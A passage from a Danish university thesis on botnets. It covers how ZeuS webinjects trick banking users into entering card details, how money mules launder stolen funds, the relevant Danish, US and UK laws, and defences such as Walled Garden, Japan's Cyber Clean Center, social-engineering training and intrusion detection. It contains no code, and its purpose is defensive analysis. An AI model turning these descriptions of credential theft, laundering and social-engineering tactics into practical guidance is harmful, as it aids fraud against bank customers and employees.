webinjects.txt. Denne er en fil, bagmanden skal udarbejde på forhånd, og som skal indeholde
de webinjects, der skal foretages på de angivne hjemmesider. Et webinject er overordnet set
en mekanisme, der kan indsætte ekstra kode på en hjemmeside, når den vises lokalt til
brugeren. Dette kan benyttes til at få brugeren til at indtaste ekstra informationer, som
efterfølgende registreres af botten og sendes retur til databasen. Anvendes eksempelvis det
webinject, der ses i appendiks 10.6, vil brugeren blive præsenteret for følgende scenarie,
indsat et sted på den originale hjemmeside med matchende layout:
Figur 13. Resultat af et fremstillet webinject.
Dette giver botnet-bagmændene mulighed for at indhente specifik information, og i dette
tilfælde mulighed for at tilegne sig brugerens kreditkortinformationer til eget brug eller til salg
på det sorte marked.
5.2 Hypotese om forretningsmodel
En forretningsmodel kan beskrives som en opsummering af, hvordan en virksomhed vil skabe
en indtægt på baggrund af en ydelse eller et produkt. Selvom ZeuS-botnet-designerne samt
bagmænd næppe har officielle virksomheder bag sig, må det alligevel anses som værende en
industri, der kan tjenes penge på. Først og fremmest har botnet-designerne udviklet et
produkt i form af en malware. Denne bliver solgt på det sorte marked, hvilket genererer en
indtjening i form af et engangsbeløb for hvert solgt eksemplar.
Derudover må man antage, at de informationer der er kommet bagmændene til kende,
herunder adgangskoder til diverse pengeinstitutter eller kreditkortinformationer, benyttes til at
stjæle penge fra ofrene. Da sådanne transaktioner normalt vil kunne spores af pengeinstitutterne, må der yderligere eksistere en form for hvidvaskning eller anden anordning, der
Daniel Jovanovic
36
gør at bagmændene kan få glæde af de penge, der er hentet hjem. Det må antages, at dette
foregår af såkaldte money mules, som er personer, der roterer pengene rundt mellem
forskellige organisationer eller lignende. Dette kunne foregå ved for eksempel at benytte
forfalsket dokumentation under oprettelsen af bankkonti og derefter overføre pengene mellem
forskellige lande, hvilket dermed øger chancen for, at bagmændene kan beholde de ulovligt
tilegnende penge.
I oktober 2010 nedlagde FBI en såkaldt Multi-Country Cyber Theft Ring, der anvendte ZeuSbotnettet til at tilegne sig adgangskoder, kontonumre samt andre informationer, der blev brugt
til at få adgang til ofrenes webbank. Denne instans af ZeuS-botnettet stjal $70 millioner fra
ofrenes bankkonti ud af $220 millioner, som ellers ville være gået tabt hvis ikke det var
lykkedes for FBI at identificere den kriminelle handling og stoppe den [23]. FBI’s nuværende
direktør, Robert S. Mueller, udtaler dog også, at det ikke ville kunne have ladet sig gøre uden
et tæt samarbejde mellem flere internationale instanser, da ingen nation, virksomhed eller
agentur kan stoppe it-kriminalitet alene. FBI har under optrevlingen af denne cyber theft ring
gjort sig følgende observationer om forretningsmodellen.
Figur 14. ZeuS’ forretningsmodel. Kilde [23].
På ovenstående figur, som er et mindre udsnit af figuren i appendiks 10.8, kan man se, at
botnet-designeren i første omgang udvikler en malware, som vedkommende enten selv
benytter eller videregiver til tredjeperson, eventuelt med en økonomisk vinding. Hackeren
ITU
37
inficerer så offerets computer, i dette specifikke tilfælde var det ved hjælp af e-mails med
botnet-malwaren vedhæftet eller links til hjemmesider med filen. Denne spam-kampagne
ramte både virksomheder, kommuner og sågar også kirker [23]. Når disse ofre efterfølgende
logger ind for at udføre deres finansielle transaktioner, gemmer botten de indtastede
informationer og sender dem retur til en opsamlingsserver. Informationerne hentes retur af
hackeren, som ved hjælp af en eller flere proxy’er benytter disse informationer til at overføre
penge fra offerets bank til en eller flere money mules. Disse money mules sender nu pengene
videre til bagmændene, undtagen en mindre procentdel, som de beholder selv som betaling for
deres del af arbejdet. Resultatet af denne organiserede kriminalitet kan som tidligere nævnt
give en kæmpe økonomisk gevinst.
Figur 15. ZeuS’ globale spredning. Kilde [23].
Det er interessant at se, at dette i høj grad foregår på internationalt niveau. Botnet-malwaren
blev udviklet i Ukraine, men var i følge FBI’s illustration målrettet mod USA og Storbritannien.
Det ses også, hvordan de personer eller organisationer der står for at overføre pengene
mellem ofrene og bagmændene befinder sig i flere verdensdele, hvilket sandsynligvist er et
bevidst valg for at besværliggøre et eventuelt opklaringsarbejde.
Daniel Jovanovic
38
5.3 Sammenfatning
Det er blevet bevist, at ZeuS har været og sandsynligvis stadig bliver brugt til at foretage itkriminalitet på et yderst organiseret niveau, og at det derfor udgør en stor trussel mod såvel
virksomheder som organisationer og private personer.
ZeuS Crimeware Toolkit er en samling af programmer, der tillader brugeren at oprette sin
egen instans af ZeuS-botnettet. Gennem guider og manualer kan man tilpasse sin botnetmalware til at indhente de informationer, man er specielt interesseret i, og dernæst kan man
sende malwaren ud på internettet og monitorere spredningen via et kontrolpanel. Graden af
brugervenlighed er stor, og det overrasker derfor ikke, at ZeuS er populært blandt kriminelle
og ses anvendt til økonomisk kriminalitet med store summer involveret.
Denne case må siges at være en bekræftelse af, at botnet som værktøj til berigelsesforbrydelser er yderst aktuelt. Brugervenligheden tillader kriminelle uden specielt kendskab til
malware at implementere sit eget botnet, en tendens som gør det ekstra vigtigt at forbedre
modmidler og tiltag for effektiv botnet-bekæmpelse.
ITU
39
Kapitel 6
Hvad kan man gøre
Da det nu kan konkluderes, at brugen af botnets kan udgøre en trussel på flere områder, er
dette kapitels formål at beskrive, hvad der kan gøres for at eliminere eller mindske truslen.
Kapitlet er struktureret ved først at beskrive det højeste abstraktionsniveau og derefter gå
dybere ned i teknologien. Dette vil sige, at der først ses på, om der er strafhjemmel i den
danske lovgivning, og herefter følger en kort redegørelse for de amerikanske og engelske love.
Men da lovgivning må anses som værende en langsigtet løsning, beskrives også hvordan
problemet kan bearbejdes her og nu med diverse tiltag, samt til sidst med tekniske værktøjer.
Da problemet med hensyn til botnets i høj grad afhænger af, om de enkelte computere eller
systemer i første omgang kan undgå at blive inficeret med en botnet-malware, fokuserer
kapitlet også på, hvordan man kan beskytte sig mod malware generelt.
6.1 Lovgivning
Hver nation har deres egen lovgivning, som er udarbejdet på forskellige måder. Afhængig af
hvordan lovgivningen er bygget op, kan problemet med botnet gribes forskelligt an. Dette
afsnit fokuserer på den danske lovgivning, men inddrager også kort de amerikanske og
engelske love.
6.1.1 Danmark
Indtil elektronisk databehandling blev en realitet, skulle lovgivere kun forholde sig til
kriminalitet begået i den fysiske verden. Men i midten af 1980’erne blev lovgivere
opmærksomme på, at datamaskiner kunne være genstand for forbrydelse eller blive brugt til
at begå forbrydelser [2]. Det var derfor interessant at se, om den danske strafferet kunne
dække disse moderne forbrydelser. I de fleste tilfælde er straffebestemmelserne udarbejdet i
en sådan grad, at de kan siges at være teknologineutrale. For eksempel ses det, i straffelovens
paragraf §291, at “Den, der ødelægger, beskadiger eller bortskaffer ting, der tilhører en
anden, straffes med bøde eller fængsel indtil 1 år og 6 måneder” [4]. Denne paragraf blev
anvendt i 1987, da en fagforeningsmedarbejder anbragte en trojansk hest på fagforeningens
computer, som slettede hele fagforeningens register efter medarbejderen blev fyret. Dog
Daniel Jovanovic
40
kunne den daværende straffelov ikke anvendes i en anden sag mod en medarbejder, der
oprettede en fiktiv lønmodtager i virksomhedens computere, som månedligt udbetalte løn til
den skyldiges konto igennem den fiktive lønmodtager [2]. I denne form for bedrageri kunne
straffelovens paragraf §279 ikke anvendes, selvom deri står “For bedrageri straffes den, som,
for derigennem at skaffe sig eller andre uberettiget vinding, ved retsstridigt at fremkalde,
bestyrke eller udnytte en vildfarelse bestemmer en anden til en handling eller undladelse,
hvorved der påføres denne eller nogen, for hvem handlingen eller undladelsen bliver
afgørende, et formuetab.” [4]. Denne kunne ikke anvendes, da dommeren ikke fandt, at en
computer kan lide under en vildfarelse. I 1985 lavede man derfor en helt ny straffebestemmelse om databedrageri i paragraf §279a, som hedder “For databedrageri straffes den,
som for derigennem at skaffe sig eller andre uberettiget vinding retsstridigt ændrer, tilføjer
eller sletter oplysninger eller programmer til elektronisk databehandling eller i øvrigt
retsstridigt søger at påvirke resultatet af sådan databehandling” [4]. I forbindelse med den
danske lov anses internettet altså på mange måder som blot at være et kommunikationsmiddel på lige fod med telefonen eller traditionelle breve og it-kriminalitet kan derfor oftest
dømmes ud fra den danske straffelov.
Overordnet set kan it-kriminalitet i den danske lov inddeles i tre faser: Angreb, adgang og
anvendelse. Til hver fase siges at være en beskyttelsesring i loven, der beskytter offeret [2].
Figur 16. Straffelovens tre beskyttelsesringe.
I forbindelse med botnets må der siges at være tale om alle tre faser af it-kriminalitet. Hvis
der fokuseres på det enkelte medlem i botnettet, er der i første omgang sket et angreb på en
computer. Dette angreb vil oftest være dækket af paragraf §293, som hedder “Den, som
uberettiget bruger en ting, der tilhører en anden, straffes med bøde eller fængsel indtil 1 år
[...]”. Dette gælder også, selvom angrebet er mislykkes. Dette skyldes paragraf §21, som
siger “Handlinger, som sigter til at fremme eller bevirke udførelsen af en forbrydelse, straffes,
når denne ikke fuldbyrdes, som forsøg” [4]. Med fokus på botnet hvis mål kan være at lamme
et system, gælder endvidere paragraf §293 stk. 2, som siger “Den, der uberettiget hindrer en
anden i helt eller delvis at råde over ting, straffes med bøde eller fængsel indtil 1 år. Straffen
kan stige til fængsel i 2 år, hvor der er tale om overtrædelser af mere systematisk eller
organiseret karakter, eller der i øvrigt foreligger særligt skærpende omstændigheder” [4].
ITU
41
Dette må siges at være specielt aktuelt i forbindelse med botnets og DDoS-angreb. Det er her
interessant at se, at der ikke blot straffes for at gøre uberettiget brug af andres systemer, men
at man også straffer for at hindre de retsmæssige ejere i at gøre brug af deres egne systemer.
Uberettiget hindring tilsidestilles altså med uberettiget brug. Derudover kan det også ses, at
straffen kan forlænges, hvis der er tale om både systematisk og organiseret angreb, hvilket et
botnet-angreb må siges at være, grundet at det som regel er centralt styret af én eller flere
bagmænd. Angribes særlig vigtige computere eller informationssystemer, gælder ydermere
paragraf §193, som siger “Den, der på retsstridig måde fremkalder omfattende forstyrrelse i
driften af almindelige samfærdselsmidler, offentlig postbesørgelse, telegraf- eller telefonanlæg,
radio- eller fjernsynsanlæg, informationssystemer eller anlæg, der tjener til almindelig
forsyning med vand, gas, elektrisk strøm eller varme, straffes med bøde eller fængsel indtil 6
år.” [4]. Der indføres altså strengere straffe afhængig af en overvejelse af målets vigtighed og
betydning for samfundets drift og stabilitet. Derudover straffes medskyldige på lige fod med
bagmændene i følge paragraf §23, der siger “Den for en lovovertrædelse givne straffebestemmelse omfatter alle, der ved tilskyndelse, råd eller dåd har medvirket til gerningen” [4].
Dette gælder dog kun, hvis den tiltalte har haft fortsæt og dermed har været klar over den
kriminelle handling.
Straffelovens kapitel 27 beskytter både personer og virksomheder, hvis disses privatliv
krænkes af udefrakommende uden tilladelse. Oprindeligt var den traditionelle privatlivsbeskyttelse tiltænkt dækning af alt inden for hjemmets fire vægge, men grundet teknologiudviklingen kan loven nu også tolkes, så privatlivsbeskyttelsen udvides til at dække personer
og virksomheders elektroniske privatsfære, som blandt andet også eksisterer på internettet,
eksempelvis webbank og e-mail. Såfremt angrebet fra første fase lykkedes, og gerningsmanden nu har adgang til systemet, brydes paragraf §263, der hedder “Med bøde eller
fængsel indtil 6 måneder straffes den, som uberettiget 1) bryder eller unddrager nogen et
brev, telegram eller anden lukket meddelelse eller optegnelse eller gør sig bekendt med
indholdet, 2) skaffer sig adgang til andres gemmer, 3) ved hjælp af et apparat hemmeligt
aflytter eller optager udtalelser fremsat i enrum, telefonsamtaler eller anden samtale mellem
andre eller forhandlinger i lukket møde, som han ikke selv deltager i, eller hvortil han
uberettiget har skaffet sig adgang” [4]. I forbindelse med botnet hvor et nyligt medlem er
blevet smittet med botnet-malwaren, har bagmændene haft adgang til computeren og dermed
til at kunne installere den skadelige software. Derudover er §263a også aktuel, der siger “Med
bøde eller fængsel indtil 1 år og 6 måneder straffes den, der uretmæssigt erhvervsmæssigt
sælger eller i en videre kreds udbreder en kode eller andet adgangsmiddel til et ikke offentligt
tilgængeligt informationssystem [...]” [4]. Disse paragraffer giver en strafhjemmel, da
gerningsmanden har opnået en uberettiget adgang til computeren og ydermere har udbredt en
Daniel Jovanovic
42
form for adgangsmiddel til computeren. Dette medfører, at gerningsmanden nu også er i stand
til at indhente oplysninger fra computeren og dermed yderligere krænke offerets eller
virksomhedens ret til privatliv.
I forbindelse med anvendelse af de tilegnede data er det ikke usandsynligt, at den installerede
botnet-malware på de enkelte computere indeholder en form for spyware, der indsamler
oplysninger fra computeren om dets brugere. Denne information kan eksempelvis anvendes til
identitetstyveri eller til at stjæle penge fra et eventuelt offers webbank. Gerningsmanden kan
desuden også videregive informationerne, hvilket har strafhjemmel i §264d, der siger “Med
bøde eller fængsel indtil 6 måneder straffes den, der uberettiget videregiver meddelelser eller
billeder vedrørende en andens private forhold” [4].
Da botnets ofte spænder over flere verdensdele, er det begrænset, hvad den danske lov kan
beskytte. Det er muligt, at strafferetten vil kunne benyttes til at standse forbrydelsen, hvis det
eksempelvis drejer sig om money mules, der befinder sig og driver deres forretning i Danmark.
Eller hvis et botnets infrastruktur skulle findes i Danmark, hvilket dog er usandsynligt. En
interessant gråzone er derimod, hvordan lovgivningen karakteriserer danske medlemmer af
botnets. Såfremt almindelige borgere ubevidst har været en del af et botnet og derigennem
udført kriminelle handlinger, vil loven ikke dømme disse, da de enkelte borgere ikke har haft
fortsæt til den kriminelle handling. Anderledes vil det derimod være i tilfælde, hvor en bruger
er klar over sin medvirken til kriminalitet, for eksempel i tilfælde af støtte til Anonymous’
DDoS-værktøj, Low-Orbit-Ion-Cannon, se afsnit 4.3. Der er dog endnu ikke set eksempler på
straffesager i sådanne situationer, så det er uvist, hvordan danske dommere vil dømme dette.
6.1.2 USA og Storbritannien
I både USA og Storbritannien er der tilføjet specifikke områder i loven med fokus på itkriminalitet. I USA’s lovgivning Titel 18 §1030, også kendt som The Computer Fraud and
Abuse Act, CFAA, kan man finde de bestemmelser, der er gjort med hensyn til it-kriminalitet
[5]. CFAA har defineret en række overordnede kriminelle handlinger inden for IT, der er
strafbare. I loven står blandt andet, at det er ulovligt at have skaffet sig uautoriseret adgang
til computere eller systemer, herunder også at tilegne sig uberettiget information af flere
forskellige karakterer samt at ændre eller slette data. Derudover ses blandt andet også, at det
er defineret strafbart i § 1030, stk. a4 at true med at forårsage skade på computere eller
systemer med det formål at afpresse ofre for penge eller anden form for værdi [5]. Dette er
specielt relevant i forhold til botnets, med hensyn til den afpresning der kan ske ved at true
med et DDoS-angreb som tidligere nævnt.
ITU
43
Computer Fraud and Abuse Act har været benyttet til at indhente strafhjemmel i forskellige
sager angående hacking og malware. Loven blev benyttet til at dømme Kevin Mitnick, den
notoriske hacker og Social Engineering-ekspert [31], samt udvikleren af Morris Wormmalwaren, som blev nævnt i afsnit 2.2 [27]. Derudover, i forbindelse med botnets, blev loven
anvendt i september 2011, da Microsoft anklagede bagmændene bag Kelihos-botnettet for
brud på blandt andet Computer Fraud and Abuse Act. Bagmændene havde bevidst tilegnet sig
uretsmæssig adgang til computere og dernæst benyttet disse ressourcer hvilket kan siges at
have skadet Microsoft og deres kunder [30]. Der afventes dom i sagen, men den vil i denne
situation uden tvivl falde til Microsofts fordel, da botnet-aktiviteten er et klart brud på
lovgivningen.
I Storbritannien eksisterer der også en specifik lovgivning, der beskriver, hvad der ikke er
tilladt inden for it-verdenen. Loven hedder Computer Misuse Act. Overordnet set er lovens
formål at have defineret en række bestemmelser, der skal være med til at beskytte al
computerudstyr samt data mod uautoriseret adgang samt modifikation [6]. De overordnede
bestemmelser er blandt andet, at det er forbudt at have tilegnet sig uautoriseret adgang til
computerudstyr, samt at det er forbudt at foretage uautoriserede handlinger med det bevidste
eller ubevidste formål at hæmme funktionaliteten af en computer eller et system. Derfor kan
det konkluderes, at der også i Storbritanniens lovgivning kan findes bestemmelser, der
klassificerer botnet-aktivitet som ulovligt.
Computer Misuse Act-lovgivningen har ligeledes været benyttet i en række straffesager
angående botnet-kriminalitet. Eksempelvis så man i 2010, at en skotsk botnet-bagmand blev
dømt for at stå bag et botnet, der blandt andet udsendte spam-mails og benyttede ofrenes
webcams til at spionere [32].
6.1.3 Botnets som et globalt problem
På trods af at de fleste nationer har deres egen lovgivning til håndtering af it-kriminalitet,
gælder stadig det faktum, at botnets i høj grad er et globalt problem, som enkelte nationers
lovgivning sjældent kan håndtere alene. Selvom loven kan benyttes til at hente strafhjemmel,
er det tvivlsomt om den kan håndhæves på internationalt niveau. Hvis danske botnetbekæmpere eksempelvis identificerer danske bots som en del af et spam-botnet med
oprindelse i Rusland, hvilket tydeligvis bryder dansk lovgivning, har en dansk domstol ingen
beføjelser til at få lukket for serveren i Rusland [36]. Her må man bede de russiske
myndigheder om at undersøge sagen og lukke for serveren. En proces som ofte vil være
langsommelig og derfor falde til fordel for botnet-bagmændene.
Daniel Jovanovic
44
For at imødekomme dette mangler der en form for international handlingsplan samt et
effektivt internationalt samarbejde, for eksempel et globalt it-politi der med den rette
myndighed kan rykke hurtigt ud hvor end truslen måtte opstå. Indtil et sådan samarbejde
bliver organiseret, kan bagmænd udnytte botnets til kriminalitet, da deres formål ofte vil være
tjent, inden forbrydelsen kan opklares med den nutidige botnet-bekæmpelse.
6.2 It-beredskabsplaner
Hvad der i høj grad gør sig gældende og som er et problem vedrørende botnets, er at der ikke
eksisterer egentlig planer for hvordan der skal reageres, eller at der eksisterer planer, som dog
er mangelfulde. Desuden kræves det, at der er ressourcer samt opbakning til at kunne sætte
beredskabsplanen til værks, hvis det skulle blive nødvendigt. Dette er både gældende på
virksomhedsniveau, nationalt niveau og på internationalt niveau. Beredskabsplaner, samt den
nødvendige opbakning og samarbejde, er nødvendige for at kunne reagere effektivt på botnettrusler og angreb.
Virksomheder skal spørge sig selv, hvordan de vil opdage infektioner, hvordan de vil standse
dem, hvordan tabte data genskabes samt hvordan man forhindrer, at data bliver stjålet og i så
fald hvordan man sikrer, at stjålne data ikke kan misbruges af gerningsmændene. Flere af
disse problemstillinger vil eksempelvis kunne afhjælpes med tekniske løsninger, men det
kræver, at virksomheden er klar over det. Det er derfor vigtigt at skabe et overblik og
udarbejde beredskabsplaner for diverse scenarier. Sådanne beredskabsplaner, der også
kendes fra den fysiske verden, bør også altid eksistere sammen med it-politikker, der
beskriver, hvad der skal ske i tilfælde af angreb, samt hvad medarbejdere må og ikke må i
forbindelse med IT.
På nationalt niveau bliver man nødt til at være flere aktører, der arbejder sammen mod
botnets. Et godt samarbejde mellem eksempelvis internetudbydere og it-sikkerhedsorganisationer er ikke kun vigtigt for at kunne reagere på en botnet-trussel, men også for at
kunne reagere hurtigt inden eventuelle spor bliver kolde. Opdages eksempelvis botnet-trafik,
skal denne for så vidt muligt null-routes, altså sendes ned i et hul i jorden [37]. Dette kræver
tillid mellem aktørerne, samt at formaliteter og procedurer på forhånd er defineret, således at
botnet-bekæmpelse kan ske hurtigt og effektivt.
Samme formaliteter og samarbejdsaftaler bør også eksistere på internationalt niveau. Men på
grund af at botnet i høj grad er et globalt problem, der krydser flere jurisdiktioner, er det som
tidligere nævnt også nødvendigt med en slags globalt it-politi, der kan reagere hurtigt på
ITU
45
trusler. I slutningen af 2011 blev et internationalt møde afholdt i London for at nærme sig en
fælles aftale om et tættere politisamarbejde med hensyn til it-kriminalitet. Der blev foreslået,
at nationerne kunne oprette et fælles værn, som kunne bekæmpe internationalt it-kriminalitet,
som et slags Interpol med fokus på internettet [36]. Da de enkelte nationer dog i nogle
tilfælde kan have betænkeligheder ved at lade deres it-udstyr beslaglægge og undersøge af
andre nationer, er det en svær opgave at få etableret et it-politi med de rette bemyndigelser.
Det handler i høj grad om tillid blandt aktørerne samt først og fremmest at få indflydelsesrige
politikere til at stole på hinanden. Først derefter kan der udarbejdes internationale beredskabsog handlingsplaner samt tildeling af de nødvendige ressourcer til et globalt it-politi [36].
6.3 Walled Garden
Begrebet Walled Garden er før set i teknologiske sammenhænge. Begrebet refererer til et
lukket område, hvor en bruger kun kan komme ud ved at følge en udpeget udgang. Dette
princip er forsøgt adopteret af it-sikkerheden, hvor TDC og Dansk Industri er i gang med at
undersøge muligheden for at gøre brug af konceptet i botnet-bekæmpelse [37]. Der ønskes
her en tilgang, hvor internetudbyderen i første omgang hindrer internetadgang for brugere,
der er blevet indlemmet i et botnet. Dette kræver, at internetudbydere er i stand til at
detektere, om der kommer mistænkelig trafik fra deres kunder. Såfremt en kunde er
klassificeret som medlem af et botnet, skal denne, næste gang internettet tilgås fra
computeren, videreføres til en Walled Garden, hvor brugeren får besked om problemet. Dette
kunne eksempelvis implementeres ved hjælp af DNS-ændringer for den aktuelle kunde. I
denne Walled Garden kunne brugeren nu blive præsenteret for en løsning til, hvordan
problemet kunne løses, inden vedkommende bevæger sig videre ud på nettet. Der er dog en
række problematikker, der skal diskuteres, herunder om internetudbydere vil bruge de
nødvendige ressourcer, om brugere skal nægtes adgang til internettet før desinficering eller
blot informeres og til sidst hvordan at botnet-malwaren skal fjernes fra de enkelte computere.
Ikke desto mindre kunne dette være en løsning til i første omgang at gøre brugere
opmærksomme på, at de er inficeret med botnet-malware, og efterfølgende hvad de kan gøre
for at fjerne den. Et lignende tiltag er allerede set i Japan og hedder Cyber Clean Center.
6.4 Cyber Clean Center i Japan
I Japan har man oprettet et såkaldt Cyber Clean Center, som skal forsvare landet mod
botnets. Centeret er et fælles projekt mellem Japans “Ministry of Internal Affairs and
Communications” og “Ministry of Economy, Trade and Industry” [40]. Formålet er at studere
botnets samt skabe awareness, og tilbyde information i hvordan man beskytter sig og
bekæmper dem. Det unikke ved dette center er det nationalt brede samarbejde, der er skabt
Daniel Jovanovic
46
for at kunne gøre dette til en realitet. 71 internetudbydere og syv sikkerhedsproducenter er
gået sammen med blandt andet varslingstjenesten JPCERT om at bekæmpe botnets, med
politisk og økonomisk opbakning fra to ministerier [40].
Figur 17. Japan’s CCC botnet-bekæmpelsesprocedurer. Kilde [40].
Som man kan se på ovenstående figur, har Japans Cyber Clean Center, herefter CCC, en
systematiseret procedure til botnet-bekæmpelse. Ved hjælp af honeypots opfanger CCC
malwaren og genererer en infection log, som undersøges. Internetudbyderen der er ansvarlig
for den aktuelle opkobling, sørger herefter for at sende en besked til den inficerede bruger om,
at vedkommende er smittet med en botnet-malware. Der refereres herefter til en hjemmeside,
hvorfra brugeren kan downloade et værktøj, som kan rense computeren. Værktøjet bliver efter
malwarens opdagelse udviklet af CCC’s program analysis group, så det passer til den
specifikke malware, og bliver derefter gjort tilgængelig på den førnævnte hjemmeside.
Brugeren eksekverer det downloadede værktøj, hvilket renser brugerens computer, som nu
igen vil være fri for malware. Det minder på mange områder om Walled Garden, som er det
tidligere nævnte tiltag, TDC og Dansk Industri undersøger i øjeblikket.
6.5 Skabe awareness om it-sikkerhed
Et stort problem med hensyn til it-sikkerhed er fænomenet kaldet Social Engineering. Dette
indebærer, at hackeren eksempelvis anvender psykologi til at manipulere offeret og dermed
opnår information, adgang eller anden nyttig fordel. Dette bliver i nogen sammenhænge anset
ITU
47
som det svageste led indenfor it-sikkerhed, fordi det ikke er bundet af logik og teknologi, men
derimod er genstand for det enkelte offers følelser og godtroenhed. Det viser sig, at 66 pct. af
alle succesfulde Social Engineering-angreb på virksomheder er udført ved udnyttelse af en eller
flere medarbejdere i sammen virksomhed, ofte igennem en indledende research [17]. Det er
derfor et ligeså vigtigt punkt at sikre tilstrækkelig oplæring af personale som at have de
tilgængelige tekniske værktøjer.
I forbindelse med botnets er det interessant at overveje, hvad der i første omgang får folk til
at downloade et program og eksekvere det. Botnet-malwaren kan være skjult i et øjensynligt
legalt program, men det er mere bekymrende, at personer ikke tænker over den konsekvens,
der kan være ved at trykke på et ukendt link fra en suspekt e-mail eller åbne en ukendt fil.
Som oftest er det fordi, at Social Engineering har været anvendt til at snyde brugeren til at tro,
at det er sikkert og i orden at udføre en specifik handling, herunder eksempelvis at trykke på
et link eller at videregive vigtig information, som ellers ikke måtte udleveres.
Eksperimenter viser ansattes tilbøjelighed til igennem Social Engineering-angreb, at udlevere
kritisk information, som kan udnyttes af hackere eller andre ondsindede personer. I et specifikt
eksperiment blev der udvalgt en repræsentant, som udadtil virkede rar og troværdig, til at gå
rundt blandt en virksomheds afdelinger og uddele nedenstående spørgeskema [17].
Repræsentanten fortalte, at de var i gang med at udføre en undersøgelse om sikkerheden på
deres netværk. Mens spørgeskemaerne blev udfyldt, forsøgte repræsentanten at skabe en god
stemning ved at hygge-snakke for at simulere tryghed og dermed få flere til at svare på de
kompromitterende spørgsmål.
Figur 18. Spørgeskema anvendt i Social Engineering. Kilde [17]
Daniel Jovanovic
48
Som man kan se på spørgeskemaet, er det specielt spørgsmål to og tre, der er kritiske. Her
bliver den adspurgte bedt om at udlevere sit brugernavn og password, som tillader indehaveren af disse at udgive sig for at være offeret på virksomhedens computere. Dette kan
både benyttes til at installere malware på systemet, som eksempelvis en malware der tilføjer
computeren til et botnet, eller til informationstyveri. Umiddelbart burde det være almindelig
viden, at en medarbejder aldrig må udlevere den slags information, men resultaterne fra
undersøgelsen viser noget andet.
Figur 19. Resultater fra Social Engineering angreb. Kilde [17].
Som man kan se, udleverede 81 pct. af de adspurgte, deres brugernavn til virksomhedens
systemer [17]. Denne information kan eventuelt benyttes til yderligere Social Engineeringangreb, da det nu kan være lettere at overbevise andre ofre, når man har en gyldig
information og dermed tilknytning til virksomheden. Mere foruroligende er det dog, at man kan
se, at 59 pct. af de adspurgte udleverede deres password, flere af disse sikkert også sammen
med brugernavnet. Holdet bag undersøgelsen har altså nu adgang til virksomhedens
computere, og en Social Engineers opgave vil i de fleste tilfælde nu være løst, nemlig at få
adgang til systemet.
Undersøgelsen er udført i år 2004, men selv i dag ses eksempler på designfejl eller
opfordringer til at skrive passwords fysisk ned på papir, som for eksempel i appendiks 10.7.
Her opfordrer IAK, Ingeniørernes Arbejdsløshedskasse, brugeren til at skrive sit password ned
på brochuren. Selvom dokumentet er til privatbrug og sikkert ikke særlig kompromitterende,
bør man aldrig opfordre en bruger til at skrive sit kodeord ned, da dette måske giver brugere
en tilbøjelighed til at give sit kodeord ud i andre tilfælde. Samme tilbøjelighed gør sig
gældende, når brugeren færdes på nettet og via e-mails eller falske hjemmesider måske
lokkes til at eksekvere malware, som eksempelvis botnet-kode. Der kan derfor ikke være tvivl
om at det er meget vigtigt at oplære private personer samt personale tilstrækkeligt, for at
undgå disse tilfælde.
ITU
49
En undersøgelse fra år 2011 bekræfter vigtigheden af denne oplæring, især angående
personlige henvendelser til ofrene. Her dokumenteres, at 78 pct. af alle rapporterede Social
Engineering-angreb blandt andet involverede en form for personlig kontakt [12].
Figur 20. Overblik over typer af Social Engineering angreb. Kilde [12]
Undersøgelsen viser også, at andre medier bliver anvendt, dog ikke i samme grad, og en bred
oplæring af personale med hensyn til Social Engineering er derfor i høj grad nødvendig.
Det formodes, at langt de fleste større virksomheder har godkendte it-sikkerhedspolitikker,
hvilket virksomheden fra den tidligere beskrevne case også havde [17]. Dette har dog vist sig
ikke at være tilstrækkeligt, selvom de ansatte årligt skulle skrive under på at have genlæst og
forstået virksomhedens politikker og procedurer. Det anbefales derfor, at virksomheder skal
opbygge et solidt forsvar igennem fire lag [16]. På første lag, foundation-laget, kræves at der
eksisterer en sikkerhedspolitik, som beskriver, hvordan virksomheden vil forsvare deres IT,
herunder også hvordan Social Engineering skal forhindres og håndteres. Ovenpå foundationlaget skal der eksistere en såkaldt Security Awareness Training for alle brugere [16]. Hvordan
denne træning skal foregå, skal også være dokumenteret i den føromtalte sikkerhedspolitik.
Medarbejdere skal trænes i security awareness, herunder blandt andet hvilke samtaler og
anmodninger der virker mistænkelige, samt oplæres i sikker adfærd på internettet i forhold til
links og eksekvering af ukendte filer. Tredje lag skal være en såkaldt Resistance training for
den type personale, der kunne være specielt udsat for Social Engineering, eller ansatte hvis
job er at hjælpe andre i virksomheden, som for eksempel Help Desk, Customer service,
receptionister, systemadministratorer osv. Disse skal trænes i ikke at lade sig overtale til at
udlevere information, og i at identificere når en anmodning virker mistænkelig eller urealistisk.
Det sidste og måske vigtigste lag, er at der skal eksistere en form for løbende påmindelse om
vigtigheden af it-sikkerhed. Denne må dog ikke genere personalet unødigt og dermed forstyrre
produktionen. Dette kunne eventuelt opnås ved jævnligt at udsende status-opdateringer
vedrørende succesfuld forhindring af Social Engineering-angreb, eller beskrivelser af angreb
hvor andre faldt i fælden og blev udnyttet. Dette får de ansatte til at huske på, hvad der skete
for deres kollegaer, eller hvordan andre succesfuldt har afvæbnet et angreb [16].
Daniel Jovanovic
50
6.6 Tekniske værktøjer mod botnets
På trods af at den danske lovgivning beskytter personer såvel som virksomheder mod itkriminalitet, må dette siges at være en langsigtet og ineffektiv løsning. Bevisbyrden kan være
svær og da den kriminelle handling kan ske på tværs af jurisdiktioner, kan det yderligere
besværliggøre en eventuel opklaring. Ligeledes kan man ikke regne med, at oplæring af
mennesker i sikker adfærd på nettet stopper angrebene, da disse også kan opstå uden
personalets indvirkning. Det er derfor yderst vigtigt med her-og-nu-løsninger, der kan mindske
antallet af hændelser. I dette afsnit beskrives derfor nogle af de tekniske værktøjer, der kan
beskytte mod malware og botnet-angreb.
6.6.1 Intrusion Detection and Prevention System
Et værktøj der ofte ses i virksomheder i dag og som kan benyttes til at spore og eventuelt
stoppe botnet-angreb, kaldes et Intrusion Detection and Prevention System, herefter IDPS.
Oprindeligt består dette af to systemer, et Intrusion Detection System og et Intrusion
Prevention System, men bliver ofte sat sammen til et IDPS på grund af de funktionelle
ligheder. Et Intrusion Detection System, herefter IDS, er et system, der automatisk overvåger
og analyserer hændelser, der sker på en computer eller et netværk. Såfremt der opstår et
brud på, hvad der er tilladt af sikkerhedspolitikken, eller hvis mistænkelig trafik detekteres, så
bliver dette logget og meddelt til en eventuel administrator. Et Intrusion Prevention System,
herefter IPS, har de samme egenskaber som et IDS, men kan derudover også forsøge at
stoppe en ondsindet hændelse i at blive udført.
